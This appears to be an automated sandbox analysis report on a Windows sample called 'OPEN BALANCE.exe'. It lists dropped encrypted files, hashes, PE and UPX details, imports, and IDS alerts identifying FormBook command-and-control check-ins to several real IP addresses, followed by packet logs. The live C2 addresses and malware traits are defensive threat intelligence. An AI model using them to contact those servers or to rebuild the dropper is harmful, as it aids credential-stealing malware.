Preview:	.....XRUWh.1....t.AK..}T8...G56OHAAH7XRUW0TL8G56OHAAH7XRUW.TL8I*.AH.H...S....$Q4.F='&3)Zx149^;8.%P.==/a!Yx....9#\".;BBeAH7XRUWIUE.zUQ.u!&..85.M....'R.U..tW?.O.pX .d&+)\|(P.RUW0TL8GesOH.@I7.C9.0TL8G56O.ACI<YYUWxPL8G56OHAA.$XRUG0TLXC56O.AAX7XRWW0RL8G56OHGAH7XRUW04H8G76OHAAH5X..W0DL8W56OHQAH'XRUW0T\8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XR{#U,88G5..LAAX7XR.S0T\8G56OHAAH7XRUW.TLXG56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G

C:\Users\user\AppData\Local\Temp\autB148.tmp

Download File

Process:	C:\Users\user\Desktop\OPEN BALANCE.exe
File Type:	data
Category:	dropped
Size (bytes):	9762
Entropy (8bit):	7.637018194675885
Encrypted:	false
SSDEEP:	192:Z6E+bT+X/8ER7PVz6sNiDrFdZMecXWHLNsTOr8S7t5FHXpug:Z6dwXRhNiHBNbdBjHXpP
MD5:	9286F2C4358051F207EC23B670DD70F9
SHA1:	2041413AB4F0B08384A8EE357216BAF5C3A17F99
SHA-256:	306A41846725A8A11963F8BCB3E338607C0AD1E0BE1479C81239851773409A97
SHA-512:	8618E538133B25504EDB05D4DF94F4DC3DCE8709183A8935C1978488C059BD61680869B86F1B0223EE1619D0B6D3591EEBF7CB2B516A06D4266F2960DE77A0E7
Malicious:	false
Reputation:	low
Preview:	EA06..p........f..-.k5.g5.......ue..l....g9...y..oe.Ng..]....I...K........\|.@.o..e.Nl......;.M...<..g.`........5.Z..q<..6.p.o.r..Y......g.<.M..`..Y....N...y.........<.M. ...r.'s....c ....Ad.H.....0.F.3<..Z..6...<.f....&....x..p....Bx.....Y'@0.N,.;,.t...Y.5_..n..... 5_..v.U...5_....U....5_..f.U..&.5\..>3@..N@^.d.Z..q9.z..u9......@.........G.@/Z..g......jx....t.u....$.../.u;...g@G_T.......>_.......zq8..........P..................`.M..`... ...f...@..@.'.7..@{>K,..c..,.p..Yg ._..v....A.>K(#G.e..3\|vi..G.7...8_..qf..i\|vi....f.h.,.@......5..:..-3{M....6`;..;..'.`.L..6...f..+0.ff.Y...9.......f.`.E...Y....3.y............vy.....`.....2p....<d....,vh...$......!+0.'&.....,fu5.Y..Y......r.5.X...c3.<.ki.Y.!...Gf.....,f.<.N. . .#:.....c.`........v.h.s.....,vl...,..t......40.....f.........4..@.6.-..p..S.E..5...S`.N...;8.`..<.......q;.....c....Z&..wx.....vr........E......y6....p.c3.=..7..b.!....F ...B5f...........vt......fvk=.x...B3......;;.X...d....8........g`...Mg..D..f...

C:\Users\user\AppData\Local\Temp\fascinatress

Download File

Process:	C:\Users\user\Desktop\OPEN BALANCE.exe
File Type:	data
Category:	dropped
Size (bytes):	285184
Entropy (8bit):	7.994611711967498
Encrypted:	true
SSDEEP:	6144:E6Ms1eXVoqHSEprbPYE98zycy/nP72yaRDD37sm9CGSR7+29vt8:teyqHrU4PSyaxJVu+2H8
MD5:	B5C847F5D1E8C325A2C399B0501824C1
SHA1:	B2463AAA9A313A6DE067F15051B6089130C5040B
SHA-256:	5BC1EF2D32BE8693B5BF5EB6EF74E9FA41AD77CE8B6A3E9196EA0901C5278478
SHA-512:	8F24C73BD6DF1BD0BD3E2136FE66E79337EA7E8B66011BF28F8C456469FAB2D4E698F8BE739A3F51DA21C71444F77FEF401998E84838C626FE794BE60AE99022
Malicious:	false
Preview:	.....XRUWh.1....t.AK..}T8...G56OHAAH7XRUW0TL8G56OHAAH7XRUW.TL8I*.AH.H...S....$Q4.F='&3)Zx149^;8.%P.==/a!Yx....9#\".;BBeAH7XRUWIUE.zUQ.u!&..85.M....'R.U..tW?.O.pX .d&+)\|(P.RUW0TL8GesOH.@I7.C9.0TL8G56O.ACI<YYUWxPL8G56OHAA.$XRUG0TLXC56O.AAX7XRWW0RL8G56OHGAH7XRUW04H8G76OHAAH5X..W0DL8W56OHQAH'XRUW0T\8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XR{#U,88G5..LAAX7XR.S0T\8G56OHAAH7XRUW.TLXG56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G56OHAAH7XRUW0TL8G

C:\Users\user\AppData\Local\Temp\unjust

Download File

Process:	C:\Users\user\Desktop\OPEN BALANCE.exe
File Type:	ASCII text, with very long lines (28674), with no line terminators
Category:	dropped
Size (bytes):	28674
Entropy (8bit):	3.5821913311967166
Encrypted:	false
SSDEEP:	768:JxBr6ScFCo3T3iC+vt63YntRUu+nZ+nskm/psl2HzpmL5sCWi:Zr6ScFCo3T3i3vt63YntRUu+nZ+nskmi
MD5:	910621DBC08E916C429C470240FE393F
SHA1:	CF7D6DFCE0047896F20DC51485957D6510EA0D44
SHA-256:	37E5EB6C26C890E4172BBC958A33EDDB12C078DC970148575FEFEDA0E30FDEFF
SHA-512:	2C874B04DC47FA0C9154BCA7DAC9DD2C189D5FA812D460012CCD0DD40AE5E3B7E7572A5F85F34016CA664A03B1D47F73AE063537C4262E935169252C31AD135F
Malicious:	false
Preview:	3{88;ehf;4hfff353333898:e;9e33333399;<78;7e<9833333399;<7g;9ed:533333399;<88;;e;9h33333399;<78;de<9833333399;<7g;fed9f33333399;<88;he;6633333399;<78<3e<6533333399;<7g<5ed5h33333399;<88<7e;9733333399;<78<9e<9f33333399;<7g<;ed9f33333399;<88<d66f399;<78<fe<9h33333399;<;g77iiiiiied:733333399;<<879iiiiiie;9733333399;<;87;iiiiiie<9f33333399;<;g7diiiiiied9f33333399;<<87fiiiiiie;5h33333399;<;87hiiiiiie<9733333399;<;g83iiiiiied9f33333399;<<885iiiiiie;9f33333399;<;887iiiiii66f<99;<;g89iiiiiied:833333399;<88g3e;:633333399;<78g5e<9833333399;<7gg7ed:533333399;<88g9e;6633333399;<78g;e<6533333399;<7ggded5h33333399;<88gfe;9733333399;<78ghe<9f33333399;<7gh3ed9f33333399;<88h566f399;<78h7e<9433333399;<;g9;iiiiiied9733333399;<<89diiiiiie;:933333399;<;89fiiiiiie<9433333399;<;g9hiiiiiied:333333399;<<8:3iiiiiie;9<33333399;<;8:5iiiiiie<6633333399;<;g:7iiiiiied6533333399;<<8:9iiiiiie;5h33333399;<;8:;iiiiiie<9733333399;<;g:diiiiiied9f33333399;<<8:fiiiiiie;9f33333399;<;8:hiiiiii66f<99;<7g;3ed:633333399;<88d3e;9;

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit):	7.952742584046444
TrID:	Win32 Executable (generic) a (10002005/4) 99.39% UPX compressed Win32 Executable (30571/9) 0.30% Win32 EXE Yoda's Crypter (26571/9) 0.26% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	OPEN BALANCE.exe
File size:	770'560 bytes
MD5:	3c7e962b0a10cdb5cc5de42bc2e29d5d
SHA1:	97ba323d41b125a63f7351aec41a0831a6450fd1
SHA256:	b1ca66c8cc7404a8093a85dc99ba848d7b4b307e463dd930ec91c509e1e81df2
SHA512:	27ce188af4385a5a1d33c0e3a6afb91e443ea59da972cf2196d214195e754c5ad4053bd30dc75af91f93203153ee004f91f87aac1cf2485713fd2c1ca5de926d
SSDEEP:	12288:OsHzOUNUSB/o5LsI1uwajJ5yvv1l2y8PvYrVMjA4LhaZOtx2nngTmp0jmkPlsZc:xiUmSB/o5d1ubcv2YOjA46jnnB0KkyC
TLSH:	16F423269580DC05C17163B4C476CEA09ABAB130DEC87777DB91E39EE432352E817A7E
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x544710
Entrypoint Section:	UPX1
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A24C03 [Thu Jul 25 12:58:43 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	21371b611d91188d602926b15db6bd48

Entrypoint Preview

Instruction
pushad
mov esi, 004E8000h
lea edi, dword ptr [esi-000E7000h]
push edi
jmp 00007FCB7485699Dh
nop
mov al, byte ptr [esi]
inc esi
mov byte ptr [edi], al
inc edi
add ebx, ebx
jne 00007FCB74856999h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007FCB7485697Fh
mov eax, 00000001h
add ebx, ebx
jne 00007FCB74856999h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
add ebx, ebx
jnc 00007FCB7485699Dh
jne 00007FCB748569BAh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007FCB748569B1h
dec eax
add ebx, ebx
jne 00007FCB74856999h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
jmp 00007FCB74856966h
add ebx, ebx
jne 00007FCB74856999h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
jmp 00007FCB748569E4h
xor ecx, ecx
sub eax, 03h
jc 00007FCB748569A3h
shl eax, 08h
mov al, byte ptr [esi]
inc esi
xor eax, FFFFFFFFh
je 00007FCB74856A07h
sar eax, 1
mov ebp, eax
jmp 00007FCB7485699Dh
add ebx, ebx
jne 00007FCB74856999h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007FCB7485695Eh
inc ecx
add ebx, ebx
jne 00007FCB74856999h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007FCB74856950h
add ebx, ebx
jne 00007FCB74856999h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
add ebx, ebx
jnc 00007FCB74856981h
jne 00007FCB7485699Bh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jnc 00007FCB74856976h
add ecx, 02h
cmp ebp, FFFFFB00h
adc ecx, 02h
lea edx, dword ptr [edi+ebp]
cmp ebp, FFFFFFFCh
jbe 00007FCB748569A0h
mov al, byte ptr [edx]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1a3e20	0x424	.rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x145000	0x5ee20	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1a4244	0x14	.rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x1448f4	0x18	UPX1
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x144914	0xa0	UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
UPX0	0x1000	0xe7000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1	0xe8000	0x5d000	0x5ca00	e030899a94b70cb6c4c058eec68f5a80	False	0.9885290148448043	data	7.937126087559066	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x145000	0x60000	0x5f400	9ec9d687b61bde91e8e4bd53a7a481df	False	0.9461224573490814	data	7.9330223042998185	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1455ac	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0x1456d8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0x145804	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0x145930	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0x145c1c	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0x145d48	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0x146bf4	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0x1474a0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0x147a0c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0x149fb8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0x14b064	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xda4a0	0x50	empty	English	Great Britain	0
RT_STRING	0xda4f0	0x594	empty	English	Great Britain	0
RT_STRING	0xdaa84	0x68a	empty	English	Great Britain	0
RT_STRING	0xdb110	0x490	empty	English	Great Britain	0
RT_STRING	0xdb5a0	0x5fc	empty	English	Great Britain	0
RT_STRING	0xdbb9c	0x65c	empty	English	Great Britain	0
RT_STRING	0xdc1f8	0x466	empty	English	Great Britain	0
RT_STRING	0xdc660	0x158	empty	English	Great Britain	0
RT_RCDATA	0x14b4d0	0x583b8	data			1.0003348090758162
RT_GROUP_ICON	0x1a388c	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x1a3908	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x1a3920	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x1a3938	0x14	data	English	Great Britain	1.25
RT_VERSION	0x1a3950	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x1a3a30	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
KERNEL32.DLL	LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.dll	GetAce
COMCTL32.dll	ImageList_Remove
COMDLG32.dll	GetSaveFileNameW
GDI32.dll	LineTo
IPHLPAPI.DLL	IcmpSendEcho
MPR.dll	WNetGetConnectionW
ole32.dll	CoGetObject
OLEAUT32.dll	OleLoadPicture
PSAPI.DLL	GetProcessMemoryInfo
SHELL32.dll	DragFinish
USER32.dll	GetDC
USERENV.dll	LoadUserProfileW
UxTheme.dll	IsThemeActive
VERSION.dll	VerQueryValueW
WININET.dll	FtpOpenFileW
WINMM.dll	timeGetTime
WSOCK32.dll	connect

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-26T09:41:48.859263+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49725	80	192.168.2.5	47.238.77.168
2024-07-26T09:41:34.500676+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49721	80	192.168.2.5	38.181.21.136
2024-07-26T09:41:23.205676+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49718	80	192.168.2.5	84.32.84.65
2024-07-26T09:41:59.707142+0200	TCP	2856318	ETPRO MALWARE FormBook CnC Checkin (POST) M4	49728	80	192.168.2.5	3.33.130.190
2024-07-26T09:42:04.916478+0200	TCP	2856318	ETPRO MALWARE FormBook CnC Checkin (POST) M4	49730	80	192.168.2.5	3.33.130.190
2024-07-26T09:41:37.119440+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49722	80	192.168.2.5	38.181.21.136
2024-07-26T09:41:46.214585+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49724	80	192.168.2.5	47.238.77.168
2024-07-26T09:42:21.016731+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49735	80	192.168.2.5	199.59.243.226
2024-07-26T09:42:49.175599+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49740	80	192.168.2.5	3.33.244.179
2024-07-26T09:40:46.731556+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49712	40.127.169.103	192.168.2.5
2024-07-26T09:42:13.232638+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49732	80	192.168.2.5	199.59.243.226
2024-07-26T09:41:39.781582+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49723	80	192.168.2.5	38.181.21.136
2024-07-26T09:41:17.900307+0200	TCP	2856318	ETPRO MALWARE FormBook CnC Checkin (POST) M4	49716	80	192.168.2.5	84.32.84.65
2024-07-26T09:42:33.405424+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49738	80	192.168.2.5	65.181.134.177
2024-07-26T09:41:32.251380+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49720	80	192.168.2.5	38.181.21.136
2024-07-26T09:41:20.597699+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49717	80	192.168.2.5	84.32.84.65
2024-07-26T09:42:28.250244+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49736	80	192.168.2.5	65.181.134.177
2024-07-26T09:42:15.875032+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49733	80	192.168.2.5	199.59.243.226
2024-07-26T09:42:02.343102+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49729	80	192.168.2.5	3.33.130.190
2024-07-26T09:42:43.250744+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49739	80	192.168.2.5	65.181.134.177
2024-07-26T09:41:25.817442+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49719	80	192.168.2.5	84.32.84.65
2024-07-26T09:40:08.362426+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49704	40.127.169.103	192.168.2.5
2024-07-26T09:41:54.129827+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49727	80	192.168.2.5	47.238.77.168
2024-07-26T09:42:57.260941+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49743	80	192.168.2.5	3.33.244.179
2024-07-26T09:42:30.827538+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49737	80	192.168.2.5	65.181.134.177
2024-07-26T09:42:18.437847+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49734	80	192.168.2.5	199.59.243.226
2024-07-26T09:42:51.732765+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49741	80	192.168.2.5	3.33.244.179
2024-07-26T09:41:51.714916+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49726	80	192.168.2.5	47.238.77.168
2024-07-26T09:42:07.486322+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49731	80	192.168.2.5	3.33.130.190
2024-07-26T09:40:57.090254+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49713	80	192.168.2.5	192.236.177.190
2024-07-26T09:42:54.328463+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49742	80	192.168.2.5	3.33.244.179

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 26, 2024 09:40:56.402235985 CEST	49713	80	192.168.2.5	192.236.177.190
Jul 26, 2024 09:40:56.407582998 CEST	80	49713	192.236.177.190	192.168.2.5
Jul 26, 2024 09:40:56.407689095 CEST	49713	80	192.168.2.5	192.236.177.190
Jul 26, 2024 09:40:56.430809021 CEST	49713	80	192.168.2.5	192.236.177.190
Jul 26, 2024 09:40:56.436084032 CEST	80	49713	192.236.177.190	192.168.2.5
Jul 26, 2024 09:40:57.089904070 CEST	80	49713	192.236.177.190	192.168.2.5
Jul 26, 2024 09:40:57.090173006 CEST	80	49713	192.236.177.190	192.168.2.5
Jul 26, 2024 09:40:57.090219021 CEST	80	49713	192.236.177.190	192.168.2.5
Jul 26, 2024 09:40:57.090254068 CEST	49713	80	192.168.2.5	192.236.177.190
Jul 26, 2024 09:40:57.106820107 CEST	80	49713	192.236.177.190	192.168.2.5
Jul 26, 2024 09:40:57.106952906 CEST	49713	80	192.168.2.5	192.236.177.190
Jul 26, 2024 09:40:57.110143900 CEST	49713	80	192.168.2.5	192.236.177.190
Jul 26, 2024 09:40:57.115768909 CEST	80	49713	192.236.177.190	192.168.2.5
Jul 26, 2024 09:41:17.276458025 CEST	49716	80	192.168.2.5	84.32.84.65
Jul 26, 2024 09:41:17.281970978 CEST	80	49716	84.32.84.65	192.168.2.5
Jul 26, 2024 09:41:17.282082081 CEST	49716	80	192.168.2.5	84.32.84.65
Jul 26, 2024 09:41:17.312856913 CEST	49716	80	192.168.2.5	84.32.84.65
Jul 26, 2024 09:41:17.321046114 CEST	80	49716	84.32.84.65	192.168.2.5
Jul 26, 2024 09:41:17.899465084 CEST	80	49716	84.32.84.65	192.168.2.5
Jul 26, 2024 09:41:17.900108099 CEST	80	49716	84.32.84.65	192.168.2.5
Jul 26, 2024 09:41:17.900306940 CEST	49716	80	192.168.2.5	84.32.84.65
Jul 26, 2024 09:41:18.827855110 CEST	49716	80	192.168.2.5	84.32.84.65
Jul 26, 2024 09:41:19.917886972 CEST	49717	80	192.168.2.5	84.32.84.65
Jul 26, 2024 09:41:19.966164112 CEST	80	49717	84.32.84.65	192.168.2.5
Jul 26, 2024 09:41:19.966285944 CEST	49717	80	192.168.2.5	84.32.84.65
Jul 26, 2024 09:41:19.996623039 CEST	49717	80	192.168.2.5	84.32.84.65
Jul 26, 2024 09:41:20.002044916 CEST	80	49717	84.32.84.65	192.168.2.5
Jul 26, 2024 09:41:20.596664906 CEST	80	49717	84.32.84.65	192.168.2.5
Jul 26, 2024 09:41:20.597362995 CEST	80	49717	84.32.84.65	192.168.2.5
Jul 26, 2024 09:41:20.597698927 CEST	49717	80	192.168.2.5	84.32.84.65
Jul 26, 2024 09:41:21.515398026 CEST	49717	80	192.168.2.5	84.32.84.65
Jul 26, 2024 09:41:22.558101892 CEST	49718	80	192.168.2.5	84.32.84.65
Jul 26, 2024 09:41:22.565546036 CEST	80	49718	84.32.84.65	192.168.2.5
Jul 26, 2024 09:41:22.565783024 CEST	49718	80	192.168.2.5	84.32.84.65
Jul 26, 2024 09:41:22.585711956 CEST	49718	80	192.168.2.5	84.32.84.65
Jul 26, 2024 09:41:22.593295097 CEST	80	49718	84.32.84.65	192.168.2.5
Jul 26, 2024 09:41:22.593336105 CEST	80	49718	84.32.84.65	192.168.2.5
Jul 26, 2024 09:41:23.205260992 CEST	80	49718	84.32.84.65	192.168.2.5
Jul 26, 2024 09:41:23.205476999 CEST	80	49718	84.32.84.65	192.168.2.5
Jul 26, 2024 09:41:23.205676079 CEST	49718	80	192.168.2.5	84.32.84.65
Jul 26, 2024 09:41:24.092663050 CEST	49718	80	192.168.2.5	84.32.84.65
Jul 26, 2024 09:41:25.135382891 CEST	49719	80	192.168.2.5	84.32.84.65
Jul 26, 2024 09:41:25.141334057 CEST	80	49719	84.32.84.65	192.168.2.5
Jul 26, 2024 09:41:25.141431093 CEST	49719	80	192.168.2.5	84.32.84.65
Jul 26, 2024 09:41:25.167515993 CEST	49719	80	192.168.2.5	84.32.84.65
Jul 26, 2024 09:41:25.211076021 CEST	80	49719	84.32.84.65	192.168.2.5
Jul 26, 2024 09:41:25.817111015 CEST	80	49719	84.32.84.65	192.168.2.5
Jul 26, 2024 09:41:25.817336082 CEST	80	49719	84.32.84.65	192.168.2.5
Jul 26, 2024 09:41:25.817367077 CEST	80	49719	84.32.84.65	192.168.2.5
Jul 26, 2024 09:41:25.817441940 CEST	49719	80	192.168.2.5	84.32.84.65
Jul 26, 2024 09:41:25.817487001 CEST	49719	80	192.168.2.5	84.32.84.65
Jul 26, 2024 09:41:25.828356981 CEST	49719	80	192.168.2.5	84.32.84.65
Jul 26, 2024 09:41:25.833363056 CEST	80	49719	84.32.84.65	192.168.2.5
Jul 26, 2024 09:41:30.998676062 CEST	49720	80	192.168.2.5	38.181.21.136
Jul 26, 2024 09:41:31.004218102 CEST	80	49720	38.181.21.136	192.168.2.5
Jul 26, 2024 09:41:31.004400969 CEST	49720	80	192.168.2.5	38.181.21.136
Jul 26, 2024 09:41:31.033329964 CEST	49720	80	192.168.2.5	38.181.21.136
Jul 26, 2024 09:41:31.038753986 CEST	80	49720	38.181.21.136	192.168.2.5
Jul 26, 2024 09:41:32.250417948 CEST	80	49720	38.181.21.136	192.168.2.5
Jul 26, 2024 09:41:32.251308918 CEST	80	49720	38.181.21.136	192.168.2.5
Jul 26, 2024 09:41:32.251339912 CEST	80	49720	38.181.21.136	192.168.2.5
Jul 26, 2024 09:41:32.251379967 CEST	49720	80	192.168.2.5	38.181.21.136
Jul 26, 2024 09:41:32.251421928 CEST	49720	80	192.168.2.5	38.181.21.136
Jul 26, 2024 09:41:32.252820969 CEST	80	49720	38.181.21.136	192.168.2.5
Jul 26, 2024 09:41:32.252887011 CEST	49720	80	192.168.2.5	38.181.21.136
Jul 26, 2024 09:41:32.550550938 CEST	49720	80	192.168.2.5	38.181.21.136
Jul 26, 2024 09:41:33.585078955 CEST	49721	80	192.168.2.5	38.181.21.136
Jul 26, 2024 09:41:33.591006041 CEST	80	49721	38.181.21.136	192.168.2.5
Jul 26, 2024 09:41:33.591106892 CEST	49721	80	192.168.2.5	38.181.21.136
Jul 26, 2024 09:41:33.620192051 CEST	49721	80	192.168.2.5	38.181.21.136
Jul 26, 2024 09:41:33.626471996 CEST	80	49721	38.181.21.136	192.168.2.5
